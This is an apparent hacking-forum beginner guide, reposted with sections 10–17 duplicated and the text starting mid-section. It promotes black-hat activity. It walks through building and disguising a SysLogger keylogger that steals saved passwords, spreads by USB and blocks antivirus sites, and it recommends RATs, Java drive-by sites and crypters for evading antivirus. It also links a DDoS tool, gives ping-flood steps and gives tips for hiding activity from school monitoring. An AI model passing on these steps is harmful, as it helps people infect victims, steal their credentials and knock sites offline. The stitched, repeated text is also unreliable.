Java driveby's (often referred to as JDB's) are the easiest way to infect people with your RAT/keylogger. A detailed definition of a JDB can be found in section 6. But to sum it up in a few words, a JDB is a fake site that uses java to infect people. JDB's are incredibly easy to set up. All they need is a webhost which allows you to upload files. Some good free ones are 000webhost.com and dolphhost.com. I recommend 000webhost because it is easier to use. It also offers free domains.
SECTION 10 – Crypters
Crypters are programs which are used to change the hash sum of a malicious file so that they are not detected by anti-virus programs. Crypters which are FUD are better because they make files completely undetectable. UD crypters make the file mostly undetectable but some programs can still detect it. If you are thinking about setting up a JDB or any other method of spreading your RAT/keylogger, I recommend making your server FUD as it will increase the chances of actually getting slaves. If you want to get a crypter, there are a lot of free ones and paid ones around. I recommend getting a paid one as it will stay FUD for longer.
SECTION 11 - Dosing and DDosing, what's the difference?
People often get confused when they are asked to explain the difference between a dos and a ddos. It even confuses me a little bit but I will try my best to explain it. A dos is a simple denial of service attack. It takes a web page offline for a moment but the attack isnt distributed, so it won't affect everyone. It isn't that effective. However a ddos attack distributes the attack, meaning it will affect other people aswell. This is a much more effective way of taking down a site as it will affect more people.
If you want to know how to do either of these, there are a few different methods:
• Dosing program
• DDosing program
• Use cmd to ping the site
• Host booter
• Refreshing the page
I will be going over the following:
- Using a DDosing program (DDos)
- Using cmd to ping the site (Dos)
- Refreshing the page (Dos)
Using a DDosing program: There are a lot of programs that can do this. I recommend one called Goodbye. It's hard hitting and free. To download it go to:http://www.mediafire.com/download.php?9jy6y8t9rjcj4fu
How to use Goodbye: Find the URL of the site you want to DDos. Type in the site and then the page you want the traffic to go to.
Example: Site - website.com Page - /example.htm
Press "Start " to start the attack.
Once the number of blocked packets is above 400 you should stop the attack as anything after that will be redundant (won't have any further effect).
Pinging the site: I couldn't remember this method off the top of my head so I have referenced a post made on NextGenUpdate.
1. Open cmd and type 'ping example.com' ^Replace example.com with the site you want to attack
2. Write down the IP address that shows up.
3. So you would type this in ur cmd: ping XX.XXX.X.XXX -t -l ##
^Replace XX.XXX.X.XXX with the IP address you want to attack
^^Replace ## with the amount of time you want to send the attack for. The longer the attack, the more effective it will be.
4. Allow the process to finish. Check back a bit later to see if the site is down.
Refreshing the page: You are probably thinking I'm an idiot for posting this method, but it's probably not what you expected it to be.
I'd like to point out that this method does not involve:
• Pressing F5
• Clicking refresh
So... You guessed it. We will be using an auto-refresher. I recommend Auto-Refresh Plus in the Chrome webstore. Download it and select custom time. Set it to 1 second. This will reload the page every second, and eventually overload the server. This may take some time.
SECTION 12 - Staying anonymous
Staying anonymous while online is something that many people can't seem to do. Every day, I go on HF and look through the beginner hacking section. And every time I see 10-20 threads all asking the same sort of thing. "How to hide IP?" "Change IP?" "Free VPN?" "How to staying anonymous?". And I always see the same replies. "Damn kid. Doesn't even know how to use a proxy" "We are not your army" "Ever heard of this magical thing called Google?" "Use the search button before posting". For those of you that encounter that sort of thing, I hope the following sections answer your questions. First off, why is it important to stay anonymous? Well, this question shouldn't really need answering. If you don't stay anonymous, your effectively allowing people to steal your identity. It's important to cover your tracks while online because there will always be somebody there, waiting to exploit even the first slip-up they see. Moral of the story: STAY ANONYMOUS!! The following 4 sections will teach you how to do that.
SECTION 13 – Proxies
Everyone has heard of proxies. Thing is, most people have no idea how to use them. Before I show you how to use a proxy, I will explain a little bit about what a proxy is and what it does. Every network has its own IP address. When you visit a website, it logs your IP address. Now, some websites don't like certain IP addresses to access them. So they block that IP address from accessing the page. What a proxy is, is basically a tunnel that all the traffic from that page goes through. The tunnel sends the traffic to another IP address. This tricks the website into thinking that the IP address at the end of the tunnel is yours, and allows you access to the page. Now that you know what a proxy is, you can set one up. First off, find a proxy (free proxies can be found at http://hidemyass.com). Every (common) browser has proxy settings, so find your browsers proxy settings area. For Google Chrome, go 'Tools'-->'Advanced'-->'LAN options'-->'Proxy settings'. Type in the proxy then select the appropriate settings (e.g. HTTPS or Socks5). Then you need to restart Chrome (just close it then open it again). Go to http://whatismyip.com to check if the proxy is working properly. If it is, it should display a different IP to your actual one.
SECTION 14 - VPN's
Many of you have probably heard of VPN's before. For those of you who don't know what they are, VPN's are VirtualPrivateNetworks. A detailed explanation of what they are can be found in section 6. Connecting to a VPN is really easy.
I will teach you how to connect to a VPN on:
• Your PC
• Your iDevice
Before I teach you how to do that, you will need to find a VPN to use. Here is a list of VPN's you might want to try.
Free VPN's:
• http://bestcanadavpn.com Best Canada VPN
• http://hideme.ru HideMe.ru
• http://hotspotshield.com Hotspot Shield
Paid VPN's:
• http://hidemyass.com HideMyAss
• http://nvpn.comn VPN
• http://openvpn.net OpenVPN
How to connect to a VPN on your PC:
This will teach you how to connect to a VPN on your PC.
- Click on the WiFi icon on the taskbar.
- Select the option ‘Open Network and Sharing Center’
- Click ‘Connect to a new connection or network’ - Select ‘Connect to a workplace’ and then click next
- Click next - Select ‘Use my internet (VPN)’ - Type in the address of the VPN you want to connect to
- Type in the username and password then click Connect - You should see the screen
You’re done! This should appear.
How to set up a VPN on your iDevice:
Heres how to connect to a VPN using your iDevice. For this tutorial we will be using the free VPN, BestCanadaVPN. I will be going over all the steps needed to set this up and a few other things. First off, you need to open up settings. Now go "General"-->"Network"-->"VPN" Now tap the "Add VPN configuration" button. It will bring up this menu. Now fill in the boxes with these. Description: VPN Server: bestcanadavpn.com Account: free Secret: (put anything here) Now we need to get the password. So open up safari and head over to bestcanadavpn.com You will see the password on the homepage. Now type the password into the "Password" box in the VPN configuration. Now tap "Save". Congratulations! You have just set up the VPN on your iDevice! Now you need to connect to it. To do that just press the "On" button. Once you are connected, it will say so and a VPN icon will appear in the status bar. ***PLEASE NOTE*** The VPN password changes every 24 hours. Using a VPN will provide a significant amount more protection that a proxy, but won't make you completely untraceable.
SECTION 15 – Alternatives, tips and tricks
This section will cover some of the alternatives to proxies and VPN's. These methods are probably a little bit harder to use, but they are just as good (if not better).
Change your IP
Most routers have a setting which allows you to clone your MAC address and set it as your IP address. This allows you to hide your location and disguise it as. Use anonymous web searches Some sites offer anonymous web searches. This doesn't offer very good anonymity, but hey, it's better than nothing.
Ctrl+Shift+Delete
This amazing little shortcut can clear cookies and data, web history and autofill data incredibly quickly! It's great and takes almost no time to do.
Put Tor on a USB
Tor is a network which provides anonymity while on the Internet. Most schools will not allow you to download it and install it. So just download it onto a USB at home and run it when you get to school. Your school won't have a clue what you are doing online!
Use private browsing
Most browsers have a private browsing option. This opens up a session which doesn't save cookies, and can't be tracked in an administrator system. Its great because anyone can use it.
Double Desktop Switcher
Yup, everyone knows this one, but it does work! Download Double Desktop Switcher onto a USB and bring it to school. You can do whatever you want and when a teacher walks by just press the hotkey to change screens.
Use your mobile/iPod
Most schools think they are smart an monitor all the traffic on their computers. The reality is that they are dumb idiots as they don't monitor mobile traffic. I have downloaded torrents and done a whole bunch of stuff on my iPod and my school hadn't had a clue!
Use public computers
Don't do hacking stuff from home. Go to an Internet cafe or the library. Bring all your stuff on a USB and run it from that.
Combine methods
If you seriously want to stay safe while online, try this: Go to a public place and use a public computer. Sign in with fake information. Connect to a paid VPN. Go online using private browsing. Then set up your browser so it used a paid web proxy. Open up Tor on your USB. Go to a site which offers anonymous web searching.
With all of that, your Internet will probably be so slow it's unbearable, but you will be anonymous!!!! Oh yeah... did I mention that all of these will slow your internet connection speed? No? Too bad.
I’m kidding. They will slow down your connection, but not by very much, so the trade-off is worth it.
SECTION 16 – Extending your knowledge
“Don’t learn to hack, hack to learn”. You’ve probably seen that posted all around the internet. To a certain extent, it’s true. Hacking is often used to gain knowledge you wouldn’t otherwise be able to know. However if you don’t learn to hack, how can you hack?
This section will help you discover ways to extend your knowledge of hacking. Now, in order to do this, you will need to spend extensive amounts of time browsing the internet. There’s no other way. There are also no shortcuts. If you don’t put in the work, you won’t get the results. End of story.
Now that we’ve got that out of the way, let’s begin.
Since you’re probably too lazy to use google, here are some useful sites:
• Hackforums.net
• Crackhackforum.com
• Hackthissite.org
Those are pretty much the only sites you will need to start off with. They have almost ENDLESS supplies of knowledge, and have relatively friendly members. Sign up for those sites and you’ll be well on your way to becoming a successful hacker.
SECTION 17 – Closing section
Congratulations, you’ve finally reached the last section! I bet it took you a while to read through all of that, but you’ve probably learned a lot too. Now most of my knowledge has been passed down to you. I put a lot of time and effort into typing this up (7 hours to be more precise), and spell-checked this over 50 times. I even added images in (lucky you) so this guide would be easy to follow. So please, post a short thank you message in the original thread. That takes 30 seconds, this took 7 hours.
Remember, knowledge is power. But if you misuse that power it will be taken away from you. Stay true to yourself and the world will do so aswell.
1) Introduction
2) The hacker manifesto
3) What is hacking?
4) Choosing your path
5) Where should I start?
6) Basic terminology
7) Keylogging
8) RAT's
9) Java Driveby's
10) Crypters
11) Dosing and DDosing, what's the difference?
12) Staying anonymous
13) Proxies
14) VPN's
15) Alternatives, tips and tricks
16) Extending your knowledge
17) Closing section
SECTION 1 – Introduction
Hi there. If you are reading this, you're either an eager to learn beginner hacker, or an upgraded member here to judge my work. Well, in either case, I'm sure you will enjoy this thread and increase your knowledge of hacking. I will be going over ALL the basics of hacking, and a lot more. I've included tutorials aswell, so you could say this is an all-in-one guide.
SECTION 2 - The hacker manifesto
The hacker manifesto (also known as the conscience of a hacker) is an essay written by a hacker known as 'The Mentor'. It is often said to give an insight into the psychology of hackers. If you are hoping to start learning the art of hacking, this will certainly give you the right mindset for the job. "The Hacker Manifesto by +++The Mentor+++ Written January 8, 1986 Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike."
– Taken from http://www.mithral.com/~beberg/manifesto.html
That is the essay. It's quite impressive isn't it? After reading it you should have an idea of the mindset any hacker should have. I read it about 5 months ago and it has certainly sent me on the right track.
SECTION 3 - What is hacking?
What is hacking? Well, whatishacking.org defines it as "the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker. Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it's not limited to either of them." - Taken from whatishacking.org That's a great definition but in my opinion hacking is much more than that. In my opinion, hacking isn't something you can just 'learn'. It's not just a skill, it's an art. Hacking requires knowledge. Knowledge is power. In order to gain said knowledge, and the power that comes with it, a change of lifestyle is required, along with a certain amount of secrecy. Learning 'how' to hack takes time and dedication. There's no easy way to get better at it. That's right, no shortcuts and its unlikely you're going to get a helping hand. Like everything else in life, it takes practice. Don't go crying to others if it doesn't work out, just keep calm and carry on. If you are serious about becoming a hacker, you will need to be willing to change your lifestyle, and dedicate yourself to the task. With enough dedication and hard work you will excel at hacking.
SECTION 4 - Choosing your path
Ask any stranger what a hacker is, they will probably give you a really negative answer; identity theft, hacking accounts, stealing, to name a few. The reality is actually quite different. There are a few kinds of hackers, you probably only know about the bad ones. This section should give you a better understanding of the different kinds of hackers, and help you decide which kind you should become.
Black hat hackers: These are the bad guys you always hear about. These are the people giving other hackers a bad name. Black hat hackers are the ones who commit crime. They steal identities, hack accounts, ddos sites and just go about causing havoc.
Grey hat hackers: Grey hats are basically good guys. They still do illegal stuff, but they report it to the person/company they are targeting. So... Basically they do bad stuff and help people to fix it.
White hat hackers: White hat hackers are the good guys. They fix stuff and help people. They don't do illegal stuff. You've probably never heard of an event where a hacker does something good but these guys do that all the time.
Examples of white hat hackers are:
• Technicians
• Cyber security teams
• IT consultants
Now that you have a better understanding of the 'types' of hackers, you need to choose your path. This requires a lot of thinking, because you need to consider the possibilities of each path. Black hat is the easiest path to choose. It's 'fun' and it has the most benefits. It also is the only one that will get you in trouble and maybe even arrested. Grey hat is a slightly more difficult path. You (technically) are a good guy but most people won't see you as such. Grey hats have a hard time because although they are trying to help, the method they are using isn't really that legal. If you do choose to be a Grey hat, be aware that some people won't believe you are really trying to help, and you may still get in trouble. The last and most difficult path is White hat. As I mentioned before, White hats are the good guys. Their job is to help. Becoming a White hat may seem boring but you are helping people, and that should be a reward in itself. The only problem with becoming a What hat is that you will have to start out as a Black hat. I personally would recommend that you start out as a Grey hat. You'll get more out of it.
SECTION 5 - Where should I start?
This is the question that most people ask. I honestly don't think there is any one place to start. Ask around on any forum and people will always tell you to learn to use RAT's and keyloggers. To be honest I wouldn't recommend doing that straight away. I would advise to learn the basic terminologies of hacking (see section 6) and try to get an idea of exactly what everything means. It's really important to understand stuff before you go downloading random hacking programs from the Internet. It you don't know how to use them, or if they are viruses, you only have yourself to blame.
SECTION 6 - Basic terminology
As I mentioned in the previous section, it is important to have a decent amount of knowledge about hacking before you can start. So I've taken the liberty of typing up a list of common terminologies you should know.
Common terminologies:
Ddos - Distributed denial of service attack. This is where a website is flooded with packets of data from multiple sources and the server basically overloads. Ddos attacks are often confused with Dos attacks.
Dos - Denial of service attack. This is where a site is flooded with packets of data from a single source. A Dos isn't as effective as a ddos, but it is a lot easier, as you can Dos straight from cmd.
404 Error - The error you are given when a site is down. If you have attacked a site and don't see this, your attack wasn't successful.
cmd - Command prompt. This is basically MS-Dos, except it's now just a program with some commands rather than an OS. Cmd can be used to perform tasks using commands.
.bat - Batch file extension. This is the file type which is opened in cmd. Most .bat's that you will see online will be malicious. Some are good though.
RAT - Remote Administration Tool. RAT's are the most commonly used tools by beginner hackers. RAT's are favored because they are easy to use and they perform many functions. They also allow control over of the infected computer, which makes them very popular. Slave - A user which has been infected with your keylogger/RAT.
Keylogger - A program which logs the keystrokes of a computer. These are usually the first things that beginner hackers learn to use. They have a lot of functions but they aren't as good as RAT's.
Crypter - A program used to change the hash sum of a malicious program so that it is undetectable by anti-virus programs.
FUD - Fully UnDetectable. A program which is FUD cannot be detected by ANY anti-virus program. UD - UnDetectable. A program which is UD is mostly undetectable but can be detected by some anti-virus programs.
JDB - Java Driveby. A fake site which contains a java applet. This java applet is used to download and execute (run) a certain program. The slave as to click the 'allow plugin to run' button to start the applet.
Silent Java Driveby - A java driveby that's downloads and executes a file without the user seeing any pop-ups. These are more effective than normal java driveby's as they are less suspicious.
Direct link - The direct download link to a certain file. When you download a file from a site (e.g. Mediafire), you are given a download link which redirects you to a page with a download button. However a direct link is a link which leads directly to the file. There is no download button, the download starts straight away.
FTP - File Transfer Protocol. An FTP server is a server used to store and send files.
OS - Operating system
vb - Microsoft Visual Basic. This is a coding language used to make a lot of programs.
.NET - Microsoft .NET framework. This is another coding language made by Microsoft. It is used to create programs.
C/C+/C++/C# - Commonly use coding languages. They are often used to code games.
IP address - The address used to identify your network while on the Internet. Every computer has a different IP address, and therefore every IP address is unique.
VPN - Virtual Private Network. This is a network you can connect to on a computer. It will give you anonymity while online. A VPN will hide your IP address by tricking sites and programs into thinking you are somewhere you are not.
Proxy - A proxy redirects web traffic through a virtual tunnel to another IP address. A proxy is like a VPN but only tricks websites, not the whole computer. That may seem like a lot of things to remember, but it's not that much considering those are just the basics. Don't let that put you off learning though, once you start to learn one thing, another will follow and so on so forth.
Keylogging
Keylogging is one of the most basic things in hacking. I explained what a keylogger is in section 6. Downloading a good, free keylogger isn't that hard to do. Just search around HackForums and you will find one in about 30 seconds. I would recommend using SysLogger as it is free and really easy to use. It has many features and allows for the logs to be sent via Email or an FTP server. SysLogger has a really nice interface, so you should be able to figure out how to use it. However if you can't figure it out, or would like to know how to use it before getting it, here is a tutorial I typed up a while ago:
Are your friends bothering you? Need to get back at someone? Or do you just want to learn some of the basics of hacking accounts? In any case, this thread will be INCREDIBLY useful to you.
First of all, heres what this method will require and what it will involve:
- Computer (duhh)
- Internet connection
- Keylogger, we will be using one called SysLogger
- Target
- Making a fake program that the target will want to open
- An email (preferably a Gmail)
So, lets get started.
First thing you will need is SysLogger. You can download it at the bottom of the thread.
Open it up. You will be given a message, just click 'OK'.
It should open up the GUI.
Tick the following boxes:
- Encrypt email
- Stealers
- Delete cookies
- Block AV sites
- USB spread
- Startup
- Kill Taskman (optional, leave blank if you want this to be more stealthy)
- Force steam
- Clipboard logger
- Screen logger
Those options will do the following:
Stealers = Sends you saved passwords for internet browsers
Block AV site = Stops the slave from checking an antivirus site if they get suspicious
USB spread = Infects any USB devices plugged into the machine, so if they are put into other computers they will infect them
Startup = Runs the keylogger every time the machine is switched back on
Kill Taskman = Stops the slave opening task manager
Clipboard logger = Saves anything copy/pasted
Screen logger - Sends you a screen shot of the victims PC
Next we have to tick the box called 'Enable Error'. This will give the slave an error message when they open the file, make sure you put in something creative, but relevant the fake program.
Click 'Test Error' to make sure it is working.
Now we need to fill in the mailing options. I recommend using mail as opposed to FTP because it is more secure and its a lot easier. Put in your email address and password. If you are using a Gmail you don't have to change the 'SMTP' options, if you aren't google the SMTP options for your email provider. Click 'test email', if a box pops up saying success, you've done everything right, if not, go back and do it again. There should be a box below that which says 'Interval'. Set that to whatever time you want.
Now click 'Change file properties'. This will open up another GUI. Find an icon that suits your fake program here
The icon changer might not work for everyone. If it doesn't, download a free icon changer from google.
Close the properties window.
Click 'Build Server'. This will build the keylogging file. Make sure you have your antiviruses disabled as they will delete the file. You can reactivate them when you are done.
Congrats, you've built the keylogger!
Now all you need to do is send it to your slave and get them to open it!
If you accidentally open your keylogger, just open up SysLogger and click 'Cure'. Type in the name of the file and you will be cured.
I hope you guys find this useful!
If you do, please post a thanks.
Hope this helps you guys
SECTION 8 - RAT's
RAT stands for Remote Administration Tool (though some people say it stands for Remote Administration Trojan). You can find a definition of what a RAT is in section 6. As I mentioned in that section, a RAT has a lot more functions than a keylogger. Using a RAT can also allow you to get photos of your slave if they have a webcam. I don't currently have a tutorial on how to use a RAT, so you will have to search for one yourself, sorry about that.
However I do recommend the following RAT's:
• Dark comet (free)
• Blue banana (paid, but very cheap)
They are very easy to use and have many useful functions. In my opinion I think those are the best RAT's around (that don't cost too much).
SECTION 9 - Java Driveby's
Java driveby's (often referred to as JDB's) are the easiest way to infect people with your RAT/keylogger. A detailed definition of a JDB can be found in section 6. But to sum it up in a few words, a JDB is a fake site that uses java to infect people. JDB's are incredibly easy to set up. All they need is a webhost which allows you to upload files. Some good free ones are 000webhost.com and dolphhost.com. I recommend 000webhost because it is easier to use. It also offers free domains.
SECTION 10 – Crypters
Crypters are programs which are used to change the hash sum of a malicious file so that they are not detected by anti-virus programs. Crypters which are FUD are better because they make files completely undetectable. UD crypters make the file mostly undetectable but some programs can still detect it. If you are thinking about setting up a JDB or any other method of spreading your RAT/keylogger, I recommend making your server FUD as it will increase the chances of actually getting slaves. If you want to get a crypter, there are a lot of free ones and paid ones around. I recommend getting a paid one as it will stay FUD for longer.
SECTION 11 - Dosing and DDosing, what's the difference?
People often get confused when they are asked to explain the difference between a dos and a ddos. It even confuses me a little bit but I will try my best to explain it. A dos is a simple denial of service attack. It takes a web page offline for a moment but the attack isnt distributed, so it won't affect everyone. It isn't that effective. However a ddos attack distributes the attack, meaning it will affect other people aswell. This is a much more effective way of taking down a site as it will affect more people.
If you want to know how to do either of these, there are a few different methods:
• Dosing program
• DDosing program
• Use cmd to ping the site
• Host booter
• Refreshing the page
I will be going over the following:
- Using a DDosing program (DDos)
- Using cmd to ping the site (Dos)
- Refreshing the page (Dos)
Using a DDosing program: There are a lot of programs that can do this. I recommend one called Goodbye. It's hard hitting and free. To download it go to:http://www.mediafire.com/download.php?9jy6y8t9rjcj4fu
How to use Goodbye: Find the URL of the site you want to DDos. Type in the site and then the page you want the traffic to go to.
Example: Site - website.com Page - /example.htm
Press "Start " to start the attack.
Once the number of blocked packets is above 400 you should stop the attack as anything after that will be redundant (won't have any further effect).
Pinging the site: I couldn't remember this method off the top of my head so I have referenced a post made on NextGenUpdate.
1. Open cmd and type 'ping example.com' ^Replace example.com with the site you want to attack
2. Write down the IP address that shows up.
3. So you would type this in ur cmd: ping XX.XXX.X.XXX -t -l ##
^Replace XX.XXX.X.XXX with the IP address you want to attack
^^Replace ## with the amount of time you want to send the attack for. The longer the attack, the more effective it will be.
4. Allow the process to finish. Check back a bit later to see if the site is down.
Refreshing the page: You are probably thinking I'm an idiot for posting this method, but it's probably not what you expected it to be.
I'd like to point out that this method does not involve:
• Pressing F5
• Clicking refresh
So... You guessed it. We will be using an auto-refresher. I recommend Auto-Refresh Plus in the Chrome webstore. Download it and select custom time. Set it to 1 second. This will reload the page every second, and eventually overload the server. This may take some time.
SECTION 12 - Staying anonymous
Staying anonymous while online is something that many people can't seem to do. Every day, I go on HF and look through the beginner hacking section. And every time I see 10-20 threads all asking the same sort of thing. "How to hide IP?" "Change IP?" "Free VPN?" "How to staying anonymous?". And I always see the same replies. "Damn kid. Doesn't even know how to use a proxy" "We are not your army" "Ever heard of this magical thing called Google?" "Use the search button before posting". For those of you that encounter that sort of thing, I hope the following sections answer your questions. First off, why is it important to stay anonymous? Well, this question shouldn't really need answering. If you don't stay anonymous, your effectively allowing people to steal your identity. It's important to cover your tracks while online because there will always be somebody there, waiting to exploit even the first slip-up they see. Moral of the story: STAY ANONYMOUS!! The following 4 sections will teach you how to do that.
SECTION 13 – Proxies
Everyone has heard of proxies. Thing is, most people have no idea how to use them. Before I show you how to use a proxy, I will explain a little bit about what a proxy is and what it does. Every network has its own IP address. When you visit a website, it logs your IP address. Now, some websites don't like certain IP addresses to access them. So they block that IP address from accessing the page. What a proxy is, is basically a tunnel that all the traffic from that page goes through. The tunnel sends the traffic to another IP address. This tricks the website into thinking that the IP address at the end of the tunnel is yours, and allows you access to the page. Now that you know what a proxy is, you can set one up. First off, find a proxy (free proxies can be found at http://hidemyass.com). Every (common) browser has proxy settings, so find your browsers proxy settings area. For Google Chrome, go 'Tools'-->'Advanced'-->'LAN options'-->'Proxy settings'. Type in the proxy then select the appropriate settings (e.g. HTTPS or Socks5). Then you need to restart Chrome (just close it then open it again). Go to http://whatismyip.com to check if the proxy is working properly. If it is, it should display a different IP to your actual one.
SECTION 14 - VPN's
Many of you have probably heard of VPN's before. For those of you who don't know what they are, VPN's are VirtualPrivateNetworks. A detailed explanation of what they are can be found in section 6. Connecting to a VPN is really easy.
I will teach you how to connect to a VPN on:
• Your PC
• Your iDevice
Before I teach you how to do that, you will need to find a VPN to use. Here is a list of VPN's you might want to try.
Free VPN's:
• http://bestcanadavpn.com Best Canada VPN
• http://hideme.ru HideMe.ru
• http://hotspotshield.com Hotspot Shield
Paid VPN's:
• http://hidemyass.com HideMyAss
• http://nvpn.comn VPN
• http://openvpn.net OpenVPN
How to connect to a VPN on your PC:
This will teach you how to connect to a VPN on your PC.
- Click on the WiFi icon on the taskbar.
- Select the option ‘Open Network and Sharing Center’
- Click ‘Connect to a new connection or network’ - Select ‘Connect to a workplace’ and then click next
- Click next - Select ‘Use my internet (VPN)’ - Type in the address of the VPN you want to connect to
- Type in the username and password then click Connect - You should see the screen
You’re done! This should appear.
How to set up a VPN on your iDevice:
Heres how to connect to a VPN using your iDevice. For this tutorial we will be using the free VPN, BestCanadaVPN. I will be going over all the steps needed to set this up and a few other things. First off, you need to open up settings. Now go "General"-->"Network"-->"VPN" Now tap the "Add VPN configuration" button. It will bring up this menu. Now fill in the boxes with these. Description: VPN Server: bestcanadavpn.com Account: free Secret: (put anything here) Now we need to get the password. So open up safari and head over to bestcanadavpn.com You will see the password on the homepage. Now type the password into the "Password" box in the VPN configuration. Now tap "Save". Congratulations! You have just set up the VPN on your iDevice! Now you need to connect to it. To do that just press the "On" button. Once you are connected, it will say so and a VPN icon will appear in the status bar. ***PLEASE NOTE*** The VPN password changes every 24 hours. Using a VPN will provide a significant amount more protection that a proxy, but won't make you completely untraceable.
SECTION 15 – Alternatives, tips and tricks
This section will cover some of the alternatives to proxies and VPN's. These methods are probably a little bit harder to use, but they are just as good (if not better).
Change your IP
Most routers have a setting which allows you to clone your MAC address and set it as your IP address. This allows you to hide your location and disguise it as. Use anonymous web searches Some sites offer anonymous web searches. This doesn't offer very good anonymity, but hey, it's better than nothing.
Ctrl+Shift+Delete
This amazing little shortcut can clear cookies and data, web history and autofill data incredibly quickly! It's great and takes almost no time to do.
Put Tor on a USB
Tor is a network which provides anonymity while on the Internet. Most schools will not allow you to download it and install it. So just download it onto a USB at home and run it when you get to school. Your school won't have a clue what you are doing online!
Use private browsing
Most browsers have a private browsing option. This opens up a session which doesn't save cookies, and can't be tracked in an administrator system. Its great because anyone can use it.
Double Desktop Switcher
Yup, everyone knows this one, but it does work! Download Double Desktop Switcher onto a USB and bring it to school. You can do whatever you want and when a teacher walks by just press the hotkey to change screens.
Use your mobile/iPod
Most schools think they are smart an monitor all the traffic on their computers. The reality is that they are dumb idiots as they don't monitor mobile traffic. I have downloaded torrents and done a whole bunch of stuff on my iPod and my school hadn't had a clue!
Use public computers
Don't do hacking stuff from home. Go to an Internet cafe or the library. Bring all your stuff on a USB and run it from that.
Combine methods
If you seriously want to stay safe while online, try this: Go to a public place and use a public computer. Sign in with fake information. Connect to a paid VPN. Go online using private browsing. Then set up your browser so it used a paid web proxy. Open up Tor on your USB. Go to a site which offers anonymous web searching.
With all of that, your Internet will probably be so slow it's unbearable, but you will be anonymous!!!! Oh yeah... did I mention that all of these will slow your internet connection speed? No? Too bad.
I’m kidding. They will slow down your connection, but not by very much, so the trade-off is worth it.
SECTION 16 – Extending your knowledge
“Don’t learn to hack, hack to learn”. You’ve probably seen that posted all around the internet. To a certain extent, it’s true. Hacking is often used to gain knowledge you wouldn’t otherwise be able to know. However if you don’t learn to hack, how can you hack?
This section will help you discover ways to extend your knowledge of hacking. Now, in order to do this, you will need to spend extensive amounts of time browsing the internet. There’s no other way. There are also no shortcuts. If you don’t put in the work, you won’t get the results. End of story.
Now that we’ve got that out of the way, let’s begin.
Since you’re probably too lazy to use google, here are some useful sites:
• Hackforums.net
• Crackhackforum.com
• Hackthissite.org
Those are pretty much the only sites you will need to start off with. They have almost ENDLESS supplies of knowledge, and have relatively friendly members. Sign up for those sites and you’ll be well on your way to becoming a successful hacker.
SECTION 17 – Closing section
Congratulations, you’ve finally reached the last section! I bet it took you a while to read through all of that, but you’ve probably learned a lot too. Now most of my knowledge has been passed down to you. I put a lot of time and effort into typing this up (7 hours to be more precise), and spell-checked this over 50 times. I even added images in (lucky you) so this guide would be easy to follow. So please, post a short thank you message in the original thread. That takes 30 seconds, this took 7 hours.
Remember, knowledge is power. But if you misuse that power it will be taken away from you. Stay true to yourself and the world will do so aswell.
Subscribe to:
Posts (Atom)